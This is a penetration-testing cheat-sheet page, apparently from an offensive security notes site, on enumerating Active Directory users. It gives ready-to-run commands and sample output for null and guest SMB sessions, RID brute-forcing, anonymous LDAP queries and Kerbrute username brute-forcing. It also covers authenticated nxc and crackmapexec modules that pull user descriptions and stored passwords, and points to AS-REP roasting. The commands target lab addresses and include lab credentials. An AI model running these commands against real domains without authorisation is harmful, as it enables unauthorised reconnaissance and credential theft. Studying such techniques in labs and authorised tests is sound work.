Users Identification

Guest and null session

SMB (445, 139) / RPC

Null Session

$ enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt
lab_adm
htb-student
<SNIP>
$ rpcclient -U "" -N 172.16.5.5

rpcclient $> enumdomusers 
crackmapexec smb 172.16.5.5 -u '' -p '' --users
nxc smb 10.10.11.35 -u '' -p '' --shares

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

Guest session

nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
# Create a user list
nxc smb 10.10.118.214 -u 'guest' -p '' --rid-brute | grep '(SidTypeUser)' | awk '{print $6}' | sed 's/DOMAIN\\//'


nxc smb 10.10.11.35 -u 'guest' -p '' --shares

Wordlist

LogoGitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testingGitHub

jsmith.txt and a lot of usefull username list like service-accounts.txt test-accounts or top-formats.txt

Username lists
https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt

From Linkedin

LogoGitHub - initstring/linkedin2username: OSINT Tool: Generate username lists for companies on LinkedInGitHub
Social Media

LDAP

Nom Nom

Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP)

LogoGitHub - lkarlslund/ldapnomnom: Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)GitHub

Anon

$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

guest
ACADEMY-EA-DC01$
ACAD

Description field

# ldapsearch -H ldap://baby.vl -x -b "DC=baby,DC=vl" | fgrep desc
$ ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users
[+]	Found 2906 users: 

cn: Guest

cn: Htb Student
userPrincipalName: htb-student@inlanefreight.local

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

NXC

nxc ldap 192.168.1.48 -u "user.txt" -p '' -k

Kerbrute

Precompiled release:

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
$ vim valid_ad_users.txt
$ awk '{print $NF}' valid_ad_users.txt >> ad_users.txt

kerbrute doesn't always find asreproastable accounts. Always try getNPusers.py to find asreproastable accounts (doesn't require credentials, just a list of users).

Misconfiguration

LLMNR NBT-NS Poisoning

LLMNR NBT-NS Poisoning

Authent

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
$ sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users > users.txt
$ cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > final_users.txt

Windows

PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

Or With GUI: Properties -> Security -> Advanced -> Effective Access -> Select a User -> Advanced -> Object Types then "Find Now"

Columns to Add Descriptions

ADrecon

.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
PS C:\htb> .\ADRecon.ps1

[*] ADRecon v1.1 by Prashant Mahajan (@prashant3535)
[*] Running on INLANEFREIGHT.LOCAL\MS01 - Member Server
[*] Commencing - 03/28/2022 09:24:58
[-] Domain
[-] Forest
[-] Trusts
[-] Sites
[-] Subnets
[-] SchemaHistory - May take some time
[-] Default Password Policy
[-] Fine Grained Password Policy - May need a Privileged Account
[-] Domain Controllers
[-] Users and SPNs - May take some time
[-] PasswordAttributes - Experimental
[-] Groups and Membership Changes - May take some time
[-] Group Memberships - May take some time
[-] OrganizationalUnits (OUs)
[-] GPOs
[-] gPLinks - Scope of Management (SOM)
[-] DNS Zones and Records
[-] Printers
[-] Computers and SPNs - May take some time
[-] LAPS - Needs Privileged Account
[-] BitLocker Recovery Keys - Needs Privileged Account
[-] GPOReport - May take some time
[*] Total Execution Time (mins): 11.05
[*] Output Directory: C:\Tools\ADRecon-Report-20220328092458

NXC

nxc ldap 192.168.1.48 -u raj -p Password@1 –-users

# Active users

nxc ldap 192.168.1.48 -u raj -p Password@1 --active-users

# Domain admins

nxc ldap 192.168.1.48 -u raj -p Password@1 --admin-count

# Users description

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

# Get Users Password

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-unixUserPassword
PreviousTimeRoastNextPassword Policy

Last updated